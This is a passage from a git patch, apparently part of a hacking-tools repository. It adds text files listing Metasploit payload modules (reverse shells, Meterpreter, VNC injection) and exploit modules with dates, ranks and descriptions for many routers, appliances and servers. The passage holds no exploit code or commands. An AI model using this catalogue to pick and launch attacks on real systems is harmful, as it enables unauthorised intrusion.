Metasm) - windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support - windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support - windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager - windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager - windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) - windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager - windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy - windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) - windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager - windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager - windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) - windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support - windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support - windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/x64/exec normal No Windows x64 Execute Command - windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path - windows/x64/messagebox normal No Windows MessageBox x64 - windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager - windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager - windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager - windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager - windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager - windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) - windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) - windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) - windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) - windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) - windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) - windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 - windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager - windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager - windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager - windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) - windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager - windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline - windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline - windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager - windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager - windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager - windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager - windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) - - From c46736694878beea2a5b2df8a290c82ebf05b547 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 01:44:23 +0100 Subject: [PATCH 138/214] Add files via upload --- tools/exploits.txt | 1896 ++++++++++++++++++++++++++++++++++++++++++++ tools/payloads.txt | 553 +++++++++++++ 2 files changed, 2449 insertions(+) create mode 100644 tools/exploits.txt create mode 100644 tools/payloads.txt diff --git a/tools/exploits.txt b/tools/exploits.txt new file mode 100644 index 0000000..f97b623 --- /dev/null +++ b/tools/exploits.txt @@ -0,0 +1,1896 @@ +Exploits +======== + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 1 aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation + 2 aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow + 3 aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) + 4 android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution + 5 android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE + 6 android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow + 7 android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution + 8 android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit + 9 android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit + 10 android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit + 11 android/local/su_exec 2017-08-31 manual No Android 'su' Privilege Escalation + 12 apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow + 13 apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF + 14 apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow + 15 apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability + 16 bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow + 17 bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow + 18 dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow + 19 firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell + 20 freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) + 21 freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution + 22 freebsd/local/intel_sysret_priv_esc 2012-06-12 great Yes FreeBSD Intel SYSRET Privilege Escalation + 23 freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation + 24 freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation + 25 freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution + 26 freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) + 27 freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow + 28 freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow + 29 hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution + 30 irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution + 31 linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection + 32 linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability + 33 linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) + 34 linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) + 35 linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) + 36 linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution + 37 linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) + 38 linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow + 39 linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution + 40 linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution + 41 linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution + 42 linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution + 43 linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution + 44 linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution + 45 linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution + 46 linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution + 47 linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE + 48 linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow + 49 linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection + 50 linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution + 51 linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal + 52 linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability + 53 linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution + 54 linux/http/cisco_rv130_rmi_rce 2019-02-27 good No Cisco RV130W Routers Management Interface Remote Command Execution + 55 linux/http/cisco_rv32x_rce 2018-09-09 normal Yes Cisco RV320 and RV325 Unauthenticated Remote Code Execution + 56 linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution + 57 linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit + 58 linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution + 59 linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution + 60 linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow + 61 linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution + 62 linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload + 63 linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution + 64 linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution + 65 linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution + 66 linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow + 67 linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h OS Command Injection + 68 linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec + 69 linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection + 70 linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution + 71 linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow + 72 linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header + 73 linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow + 74 linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution + 75 linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow + 76 linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution + 77 linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution + 78 linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit + 79 linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection + 80 linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution + 81 linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection + 82 linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) + 83 linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection + 84 linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution + 85 linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution + 86 linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection + 87 linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection + 88 linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability + 89 linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution + 90 linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load + 91 linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection + 92 linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability + 93 linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection + 94 linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution + 95 linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution + 96 linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection + 97 linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection + 98 linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution + 99 linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection + 100 linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) + 101 linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE + 102 linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE + 103 linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie + 104 linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution + 105 linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution + 106 linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping + 107 linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow + 108 linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection + 109 linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection + 110 linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection + 111 linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection + 112 linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution + 113 linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution + 114 linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection + 115 linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution + 116 linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution + 117 linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection + 118 linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload + 119 linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution + 120 linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution + 121 linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution + 122 linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE + 123 linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution + 124 linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution + 125 linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection + 126 linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection + 127 linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation + 128 linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution + 129 linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow + 130 linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow + 131 linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution + 132 linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution + 133 linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution + 134 linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution + 135 linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution + 136 linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution + 137 linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption + 138 linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + 139 linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution + 140 linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution + 141 linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution + 142 linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution + 143 linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + 144 linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + 145 linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution + 146 linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution + 147 linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution + 148 linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include + 149 linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit + 150 linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution + 151 linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution + 152 linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload + 153 linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution + 154 linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow + 155 linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution + 156 linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution + 157 linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution + 158 linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated Remote Code Execution + 159 linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution + 160 linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection + 161 linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability + 162 linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability + 163 linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection + 164 linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection + 165 linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution + 166 linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution + 167 linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection + 168 linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 + 169 linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + 170 linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + 171 linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection + 172 linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection + 173 linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection + 174 linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection + 175 linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution + 176 linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution + 177 linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute + 178 linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution + 179 linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability + 180 linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection + 181 linux/http/webid_converter 2011-07-05 excellent 